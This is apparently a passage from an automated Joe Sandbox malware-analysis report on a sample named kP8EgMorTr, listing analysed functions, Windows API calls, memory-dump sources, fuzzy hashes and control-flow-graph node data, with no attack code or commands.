                                                                                            • Opcode ID: 60d7ce16a2dfb28095b57324ebde3eed90002995aac86d11034e397fa33880cb
                                                                                            • Instruction ID: 2ff7f870a05b5daaffb44857f5535db8439e54e135c9183d3e995141253e527c
                                                                                            • Opcode Fuzzy Hash: 60d7ce16a2dfb28095b57324ebde3eed90002995aac86d11034e397fa33880cb
                                                                                            • Instruction Fuzzy Hash: E9115972800349DFEB20CFAAC844BDEBBF8EB48310F14841AE954A7250C375A950DFA4
                                                                                            Function 009FB4E0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 009FB546
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1246179678.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_9f0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule
                                                                                            • String ID:
                                                                                            • API String ID: 4139908857-0
                                                                                            • Opcode ID: 8384b06d85f11107177b6db95a7cd1e9f5c629ac370d0264a8100c74ff9401df
                                                                                            • Instruction ID: 96e5a2d2e41bd1f6e7734962d4f4a8fa7cfbf68c7234d31e3b50aa1d0c08213f
                                                                                            • Opcode Fuzzy Hash: 8384b06d85f11107177b6db95a7cd1e9f5c629ac370d0264a8100c74ff9401df
                                                                                            • Instruction Fuzzy Hash: 7E110FB6C002498FDB20CF9AD444ADEFBF8EB88310F10842AD518A7600C379A545CFA1
                                                                                            Function 04BF32EC Relevance: 1.3, APIs: 1, Instructions: 50COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,04BF3DA9,?,?), ref: 04BF3F50
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1252134939.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4bf0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: d523c7b5ea3f4414d048a53139db812efecec8b580ca6ad6a84ebf30a71d8db8
                                                                                            • Instruction ID: 5b0f6fca9f52813a1b3be99a169718d26e15cfa69ce993870d86bf0f79ecd11f
                                                                                            • Opcode Fuzzy Hash: d523c7b5ea3f4414d048a53139db812efecec8b580ca6ad6a84ebf30a71d8db8
                                                                                            • Instruction Fuzzy Hash: 6F1155B2800349DFDB20DF9AC444BDEBBF4EB48320F108469E958A7340D339A944CFA5
                                                                                            Function 04BF3EF1 Relevance: 1.3, APIs: 1, Instructions: 49COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,04BF3DA9,?,?), ref: 04BF3F50
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1252134939.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4bf0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: 6265a4d3917e97b8e45328b716dc2e7680eca05f2053299e84bc7d99dd708a88
                                                                                            • Instruction ID: ea465937f9bd0fab48b53b8b0ae3d3b9ea156dc98abb21691c7741cc6c8cdd87
                                                                                            • Opcode Fuzzy Hash: 6265a4d3917e97b8e45328b716dc2e7680eca05f2053299e84bc7d99dd708a88
                                                                                            • Instruction Fuzzy Hash: 481125B6C00249DFDB20DF99D444BEEBBF0EB48320F20845AD958A7740D339A645CFA5
                                                                                            Function 008FD4C4 Relevance: .1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1245989626.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_8fd000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b2bf125938f2d2a735d86717d160556e1770b0a857166f5057155cceaefbbf51
                                                                                            • Instruction ID: b3210293de26a6ffb5b6e1fbf0ffcc392afbb3cc2dd5f6ea489cc036dc9634ed
                                                                                            • Opcode Fuzzy Hash: b2bf125938f2d2a735d86717d160556e1770b0a857166f5057155cceaefbbf51
                                                                                            • Instruction Fuzzy Hash: 6E21F472500348DFDB15DF24D9C0B26BB66FB98318F20C569EA054B256C336D856DAA2
                                                                                            Function 0090D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1246024272.000000000090D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0090D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_90d000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 37336c54d2992a4cdebb6231869d666f9e627b47c370f5d1e6ce3c8b9669e907
                                                                                            • Instruction ID: 451b52a4d9557e0edf032363c15ef7671e1425cb7514ef66917472b80daed96d
                                                                                            • Opcode Fuzzy Hash: 37336c54d2992a4cdebb6231869d666f9e627b47c370f5d1e6ce3c8b9669e907
                                                                                            • Instruction Fuzzy Hash: 6F210471905300EFDB15DFA8D9C0B26BBA5FB84314F20C96DE8094F2D2C33AD846CA62
                                                                                            Function 0090D01C Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1246024272.000000000090D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0090D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_90d000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e27c4771285f13ed6b2d2b650fb181d36aa9770dae298ad24771d129f82c67ba
                                                                                            • Instruction ID: 4c28ce9ceadf38c62da49d2136f5ee064169966c06bbc730f1a5837acf55574b
                                                                                            • Opcode Fuzzy Hash: e27c4771285f13ed6b2d2b650fb181d36aa9770dae298ad24771d129f82c67ba
                                                                                            • Instruction Fuzzy Hash: 8921D071604200EFDB14DF64D984B26BBB5EB84314F20C96DE80E4B2D6C33AD847CA62
                                                                                            Function 008FD4BF Relevance: .1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1245989626.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_8fd000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
                                                                                            • Instruction ID: e2b2a084d918456ca3da9052ea4a6d4347c0e1aaa02a7bf123ce8ed703d971a3
                                                                                            • Opcode Fuzzy Hash: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
                                                                                            • Instruction Fuzzy Hash: 0311E172404284DFCB15CF10D5C0B26BF72FB88314F24C6A9DA094B656C336D85ACBA2
                                                                                            Function 0090D017 Relevance: .1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1246024272.000000000090D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0090D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_90d000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                                                                                            • Instruction ID: 53863cd2ac7a7216f5f9812733733474d91a030eb2296c7bb39c6e764544ede3
                                                                                            • Opcode Fuzzy Hash: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                                                                                            • Instruction Fuzzy Hash: C3118B75504280DFDB15CF54D5C4B15FBB2FB84314F24C6AAD8494B696C33AD84ACBA2
                                                                                            Function 0090D1CF Relevance: .1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1246024272.000000000090D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0090D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_90d000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                                                                                            • Instruction ID: 2850eba3c03e270794edb7d7bdc18945ce8cb2885eaf196c049dba91a71c6390
                                                                                            • Opcode Fuzzy Hash: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                                                                                            • Instruction Fuzzy Hash: 5611BB76905280DFDB15CF58D5C0B15FBA1FB84314F24C6A9D8494B696C33AD84ACB62
                                                                                            Function 008FD731 Relevance: .0, Instructions: 45COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1245989626.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_8fd000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1382f9d433974e00a3e81204f187942f323afaa0c9ab66c54b5a2721bfa6fb8a
                                                                                            • Instruction ID: e449ecfc711629ff766e349134338edd2f435f04ca798f69ddb291f38488cb85
                                                                                            • Opcode Fuzzy Hash: 1382f9d433974e00a3e81204f187942f323afaa0c9ab66c54b5a2721bfa6fb8a
                                                                                            • Instruction Fuzzy Hash: 4701F731405348AAE7206A35CD84776BBD9FF40324F24C519EF088F282C2389840CAB2
                                                                                            Function 008FD730 Relevance: .0, Instructions: 36COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1245989626.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_8fd000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4bb59adce40d23bf7c905e5a6d53ea032716345e95024941502c8d1ea7244505
                                                                                            • Instruction ID: 111036d8ac26c617334286ba6e5131b390ffb5cb40132215b2e4af7be6e3581e
                                                                                            • Opcode Fuzzy Hash: 4bb59adce40d23bf7c905e5a6d53ea032716345e95024941502c8d1ea7244505
                                                                                            • Instruction Fuzzy Hash: B7F0C232005384AEE7209A15C984B66FFD8EB90734F28C55AEE084F282C2799844CA71

                                                                                            Non-executed Functions

                                                                                            Function 06D0B678 Relevance: 2.7, Strings: 2, Instructions: 238COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1255850284.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6d00000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Teq$xbq
                                                                                            • API String ID: 0-1834090110
                                                                                            • Opcode ID: 008c907ee1add3c13bce75cd666702e61daa8de5bca3692fb41177efcbb1e75e
                                                                                            • Instruction ID: 7f51a04827e1d837d07e2548a336fb35261fcaad86c7d6e798e21112494df20e
                                                                                            • Opcode Fuzzy Hash: 008c907ee1add3c13bce75cd666702e61daa8de5bca3692fb41177efcbb1e75e
                                                                                            • Instruction Fuzzy Hash: 42B17575E006188FDB58DF6AD984ADDBBF2BF88301F14C0AAD509AB365DB305A85CF50
                                                                                            Function 06D0AF91 Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1255850284.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6d00000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'q
                                                                                            • API String ID: 0-1807707664
                                                                                            • Opcode ID: 5e194d323c784a1ac66df7b6e5038f35b0f322bb19bf78bb4b4ae6c71c2951b7
                                                                                            • Instruction ID: 1e45082a1767044642bea5cb6ef933e3a799cb96161ef2d1c1d4ec03832fd28a
                                                                                            • Opcode Fuzzy Hash: 5e194d323c784a1ac66df7b6e5038f35b0f322bb19bf78bb4b4ae6c71c2951b7
                                                                                            • Instruction Fuzzy Hash: 8661F770E016498FD718EF7BE94169EBBF3FB88301F14D53AD0089B269EB7859068B51
                                                                                            Function 06D0AFA0 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1255850284.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6d00000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'q
                                                                                            • API String ID: 0-1807707664
                                                                                            • Opcode ID: 2f3f9e25d9b75c5679dbe69d879cbe348058af2f3b60e0ceb0988eab63a14c3f
                                                                                            • Instruction ID: 1c76ef750b59f30d5435b46b2d19c5902c5793d8c7474c4cd9c960bc575faf3f
                                                                                            • Opcode Fuzzy Hash: 2f3f9e25d9b75c5679dbe69d879cbe348058af2f3b60e0ceb0988eab63a14c3f
                                                                                            • Instruction Fuzzy Hash: D8610670E016498FE718EF7BE94169EBBF2FBC8301F14C539D0089B269EB7859068B51
                                                                                            Function 009FE124 Relevance: .3, Instructions: 264COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1246179678.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_9f0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f0fd69f64eb12f565f8851c010c661c76d6019c69254464065fb5c4908441ff9
                                                                                            • Instruction ID: 238e4be65499775640df4a6de9e0ca995bef630efcbc2e97966f80d160f12e60
                                                                                            • Opcode Fuzzy Hash: f0fd69f64eb12f565f8851c010c661c76d6019c69254464065fb5c4908441ff9
                                                                                            • Instruction Fuzzy Hash: 31A18E32E102098FCF05DFB5C8505AEB7B6FFC5301B1585BAE906AB261DB71E956CB80
                                                                                            Function 06D0DBC0 Relevance: .2, Instructions: 188COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1255850284.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6d00000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e6fea251607836a51f47e6a13f35625c01f4f3e411cd0d102dcd87afe8c792cd
                                                                                            • Instruction ID: 42ee4e755c59bab8d1e1e5616a6399a9998f68f268ee0a3461c5f95e5fb58602
                                                                                            • Opcode Fuzzy Hash: e6fea251607836a51f47e6a13f35625c01f4f3e411cd0d102dcd87afe8c792cd
                                                                                            • Instruction Fuzzy Hash: 27612374D04209CFEB54DFEAD840AEEBBB6FF89300F20912AD419A7295D7709942CF90

                                                                                            Execution Graph

                                                                                            Execution Coverage:11%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:14
                                                                                            Total number of Limit Nodes:3
                                                                                            execution_graph 19515 5e99ed8 19516 5e99f05 19515->19516 19518 5e9bde7 19516->19518 19520 5e9a20e 19516->19520 19521 5e99590 19516->19521 19519 5e99590 LdrInitializeThunk 19519->19520 19520->19518 19520->19519 19524 5e99595 19521->19524 19522 5e995a2 19522->19520 19523 5e99cd1 LdrInitializeThunk 19523->19522 19524->19522 19524->19523 19525 5e99b94 19530 5e99a4b 19525->19530 19527 5e99ce9 19528 5e99b8c LdrInitializeThunk 19528->19527 19529 5e99590 LdrInitializeThunk 19529->19530 19530->19528 19530->19529

                                                                                            Executed Functions

                                                                                            Function 031CC468 Relevance: 5.2, Strings: 4, Instructions: 209COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 148 31cc468-31cc471 149 31cc3f3 148->149 150 31cc473-31cc498 148->150 151 31cc3dd-31cc3fb 149->151 152 31cc3f4-31cc3fb 149->152 153 31cc49f-31cc4e7 150->153 154 31cc49a 150->154 160 31cc413-31cc414 151->160 161 31cc3fd-31cc400 151->161 159 31cc3fc-31cc400 152->159 152->160 162 31cc4ef-31cc4fe call 31c41a0 153->162 154->153 163 31cc40a-31cc412 159->163 160->148 161->163 166 31cc503-31cc57c call 31c3cc0 162->166 163->160 173 31cc57e 166->173 174 31cc583-31cc5a4 call 31c5658 166->174 173->174 176 31cc5a9-31cc5b4 174->176 177 31cc5bb-31cc5bf 176->177 178 31cc5b6 176->178 179 31cc5c4-31cc5cb 177->179 180 31cc5c1-31cc5c2 177->180 178->177 182 31cc5cd 179->182 183 31cc5d2-31cc5e0 179->183 181 31cc5e3-31cc627 180->181 187 31cc68d-31cc6a4 181->187 182->183 183->181 189 31cc629-31cc63f 187->189 190 31cc6a6-31cc6cb 187->190 194 31cc669 189->194 195 31cc641-31cc64d 189->195 196 31cc6cd-31cc6e2 190->196 197 31cc6e3 190->197 200 31cc66f-31cc68c 194->200 198 31cc64f-31cc655 195->198 199 31cc657-31cc65d 195->199 196->197 201 31cc667 198->201 199->201 200->187 201->200
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: PHq$PHq$PHq$PHq
                                                                                            • API String ID: 0-376399332
                                                                                            • Opcode ID: 0a764eb85d1162da7f9a65b0366fc18e8d45f8033ae5219bc72fa03e2ce3ebf0
                                                                                            • Instruction ID: f8272a6c6e14dc5c3b718c2445eab74c68d6601bb279ca63bfdea30037b32bf6
                                                                                            • Opcode Fuzzy Hash: 0a764eb85d1162da7f9a65b0366fc18e8d45f8033ae5219bc72fa03e2ce3ebf0
                                                                                            • Instruction Fuzzy Hash: E491E674E10258CFEB14DFAAD984A9DBBF2BF98310F14806AE419AB355DB309D42CF50
                                                                                            Function 031CA088 Relevance: 3.4, Strings: 2, Instructions: 887COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (oq$4'q
                                                                                            • API String ID: 0-1336004174
                                                                                            • Opcode ID: 26379d7ab905d3f191995dd95647b66bf1662d6aad2a4ad565ce913ca9041861
                                                                                            • Instruction ID: a8f221c1a3348f84f62eb53a1c2757bc116a786c48d303282445a339aae18016
                                                                                            • Opcode Fuzzy Hash: 26379d7ab905d3f191995dd95647b66bf1662d6aad2a4ad565ce913ca9041861
                                                                                            • Instruction Fuzzy Hash: 5C826F71A10289DFCB16CFA8C984AAEBBF6FF9C310F158559E405DB2A1D731E981CB50
                                                                                            Function 031C7118 Relevance: 2.9, Strings: 2, Instructions: 417COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1624 31c7118-31c713b 1625 31c713d-31c7143 1624->1625 1626 31c7146-31c7166 1624->1626 1625->1626 1629 31c716d-31c7174 1626->1629 1630 31c7168 1626->1630 1632 31c7176-31c7181 1629->1632 1631 31c74fc-31c7505 1630->1631 1633 31c750d-31c7519 1632->1633 1634 31c7187-31c719a 1632->1634 1639 31c751b-31c7521 1633->1639 1640 31c7537-31c753c 1633->1640 1637 31c719c-31c71aa 1634->1637 1638 31c71b0-31c71cb 1634->1638 1637->1638 1650 31c7484-31c748b 1637->1650 1651 31c71cd-31c71d3 1638->1651 1652 31c71ef-31c71f2 1638->1652 1641 31c753f-31c7541 1639->1641 1642 31c7523-31c7527 1639->1642 1640->1641 1643 31c752b-31c7536 1641->1643 1644 31c7543-31c7546 1641->1644 1642->1643 1643->1640 1647 31c753d-31c7549 1643->1647 1648 31c74cd-31c74d1 1644->1648 1649 31c7548-31c756e 1644->1649 1678 31c754b-31c7550 1647->1678 1679 31c7552-31c7556 1647->1679 1680 31c74d3-31c74d7 1648->1680 1656 31c7575-31c7585 1649->1656 1657 31c7570-31c7574 1649->1657 1650->1631 1655 31c748d-31c748f 1650->1655 1653 31c71dc-31c71df 1651->1653 1654 31c71d5 1651->1654 1658 31c734c-31c7352 1652->1658 1659 31c71f8-31c71fb 1652->1659 1661 31c7212-31c7218 1653->1661 1662 31c71e1-31c71e4 1653->1662 1654->1653 1654->1658 1660 31c743e-31c7441 1654->1660 1654->1661 1663 31c749e-31c74a4 1655->1663 1664 31c7491-31c7496 1655->1664 1690 31c758b-31c759a 1656->1690 1691 31c7587-31c7589 1656->1691 1657->1656 1658->1660 1665 31c7358-31c735d 1658->1665 1659->1658 1666 31c7201-31c7207 1659->1666 1674 31c7508 1660->1674 1675 31c7447-31c744d 1660->1675 1676 31c721e-31c7220 1661->1676 1677 31c721a-31c721c 1661->1677 1669 31c727e-31c7284 1662->1669 1670 31c71ea 1662->1670 1663->1633 1671 31c74a6-31c74ab 1663->1671 1664->1663 1665->1660 1666->1658 1672 31c720d 1666->1672 1669->1660 1689 31c728a-31c7290 1669->1689 1670->1660 1687 31c74ad-31c74b2 1671->1687 1688 31c74f0-31c74f3 1671->1688 1672->1660 1674->1633 1683 31c744f-31c7457 1675->1683 1684 31c7472-31c7476 1675->1684 1685 31c722a-31c7233 1676->1685 1677->1685 1686 31c755c-31c755d 1678->1686 1679->1686 1681 31c74dd-31c74e0 1680->1681 1682 31c74d9 1680->1682 1693 31c74b6-31c74b9 1681->1693 1694 31c74e2-31c74e4 1681->1694 1682->1633 1692 31c74db 1682->1692 1683->1633 1696 31c745d-31c746c 1683->1696 1684->1650 1699 31c7478-31c747e 1684->1699 1697 31c7235-31c7240 1685->1697 1698 31c7246-31c724b 1685->1698 1687->1674 1700 31c74b4 1687->1700 1688->1674 1695 31c74f5-31c74fa 1688->1695 1701 31c7296-31c7298 1689->1701 1702 31c7292-31c7294 1689->1702 1712 31c759c-31c75ab 1690->1712 1713 31c75e4 1690->1713 1703 31c75e9-31c75eb 1691->1703 1692->1681 1693->1674 1705 31c74bb-31c74c0 1693->1705 1694->1674 1704 31c74e6-31c74e9 1694->1704 1695->1631 1695->1655 1696->1638 1696->1684 1697->1660 1697->1698 1710 31c7251-31c726e 1698->1710 1699->1632 1699->1650 1700->1705 1706 31c72a2-31c72b9 1701->1706 1702->1706 1704->1688 1705->1694 1711 31c74c2-31c74c4 1705->1711 1716 31c72bb-31c72d4 1706->1716 1717 31c72e4-31c730b 1706->1717 1727 31c7274-31c7279 1710->1727 1728 31c7362-31c7398 1710->1728 1711->1680 1714 31c74c6-31c74cb 1711->1714 1712->1713 1720 31c75ad-31c75b3 1712->1720 1713->1703 1714->1648 1716->1728 1732 31c72da-31c72df 1716->1732 1717->1674 1734 31c7311-31c7314 1717->1734 1721 31c75b5 1720->1721 1722 31c75b7-31c75c3 1720->1722 1726 31c75c5-31c75de 1721->1726 1722->1726 1726->1713 1743 31c75e0-31c75e2 1726->1743 1727->1728 1737 31c739a-31c739e 1728->1737 1738 31c73a5-31c73ad 1728->1738 1732->1728 1734->1674 1736 31c731a-31c7343 1734->1736 1736->1728 1755 31c7345-31c734a 1736->1755 1740 31c73bd-31c73c1 1737->1740 1741 31c73a0-31c73a3 1737->1741 1738->1674 1742 31c73b3-31c73b8 1738->1742 1745 31c73e0-31c73e4 1740->1745 1746 31c73c3-31c73c9 1740->1746 1741->1738 1741->1740 1742->1660 1743->1703 1747 31c73ee-31c740d call 31c76f1 1745->1747 1748 31c73e6-31c73ec 1745->1748 1746->1745 1749 31c73cb-31c73d3 1746->1749 1751 31c7413-31c7417 1747->1751 1748->1747 1748->1751 1749->1674 1750 31c73d9-31c73de 1749->1750 1750->1660 1751->1660 1753 31c7419-31c7435 1751->1753 1753->1660 1755->1728
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3699575343.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_31c0000_kP8EgMorTr.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (oq$(oq
                                                                                            • API String ID: 0-1396055846
                                                                                            • Opcode ID: 8c9f5b36e4687d60ac049f1526cfe3af744021f6f2094cc320b4538b1c169c23
                                                                                            • Instruction ID: 9443415ece5f86b677e2c759519953e604b580e2cf70de6b9091f5ae8ca43315
                                                                                            • Opcode Fuzzy Hash: 8c9f5b36e4687d60ac049f1526cfe3af744021f6f2094cc320b4538b1c169c23
                                                                                            • Instruction Fuzzy Hash: 64F15D71A20259CFCB15CF69D884AADBBB6BF5C310F1980A9E845EB3A1D770E841CF50
                                                                                            Function 031CC147 Relevance: 2.7, Strings: 2, Instructions: 231COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1757 31cc147-31cc158 1758 31cc15a-31cc172 1757->1758 1759 31cc184 1757->1759 1763 31cc17b-31cc17e 1758->1763 1764 31cc174-31cc179 1758->1764 1760 31cc186-31cc18a 1759->1760 1765 31cc18b-31cc199 1763->1765 1766 31cc180-31cc182 1763->1766 1764->1760 1768 31cc11b 1765->1768 1769 31cc19b-31cc1a1 1765->1769 1766->1758 1766->1759 1770 31cc12c 1768->1770 1771 31cc11d-31cc120 1768->1771 1772 31cc123-31cc129 1769->1772 1773 31cc1a3-31cc1c8 1769->1773 1778 31cc131-31cc145 1770->1778 1774 31cc0cf-31cc0d9 1771->1774 1775 31cc122 1771->1775 1776 31cc1cf-31cc2ac call 31c41a0 call 31c3cc0 1773->1776 1777 31cc1ca 1773->1777 1774->1778 1779 31cc0db-31cc0f3 1774->1779 1775->1772 1797 31cc2ae 1776->1797 1798 31cc2b3-31cc2e4 call 31c5658 1776->1798 1777->1776 1787 31cc118 1779->1787 1788 31cc0f5-31cc0fb 1779->1788 1787->1768 1788->1778 1790 31cc0fd-31cc111 1788->1790 1790->1778 1794 31cc113 1790->1794 1794->1787 1797->1798 1801 31cc2eb-31cc2ef 1798->1801 1802 31cc2e6 1798->1802 1803 31cc2f4-31cc2fb 1801->1803 1804 31cc2f1-31cc2f2 1801->1804 1802->1801 1806 31cc2fd 1803->1806 1807 31cc302-31cc310 1803->1807 1805 31cc313-31cc357 1804->1805 1811 31cc3bd-31cc3d4 1805->1811 1806->1807 1807->1805 1813 31cc359-31cc36f 1811->1813 1814 31cc3d6-31cc3ea 1811->1814 1818 31cc399 1813->1818 1819 31cc371-31cc37d 1813->1819 1815 31cc3ec-31cc3fb 1814->1815 1820 31cc3fd-31cc400 1815->1820 1821 31cc413-31cc471 1815->1821 1824 31cc39f-31cc3bc 1818->1824 1822 31cc37f-31cc385 1819->1822 1823 31cc387-31cc38d 1819->1823 1826 31cc40a-31cc412 1820->1826 1831 31cc3f3 1821->1831 1832 31cc473-31cc498 1821->1832 1825 31cc397 1822->1825 1823->1825 1824->1811 1825->1824 1826->1821 1833 31cc3dd-31cc3ea 1831->1833 1834 31cc3f4-31cc3fb 1831->1834 1835 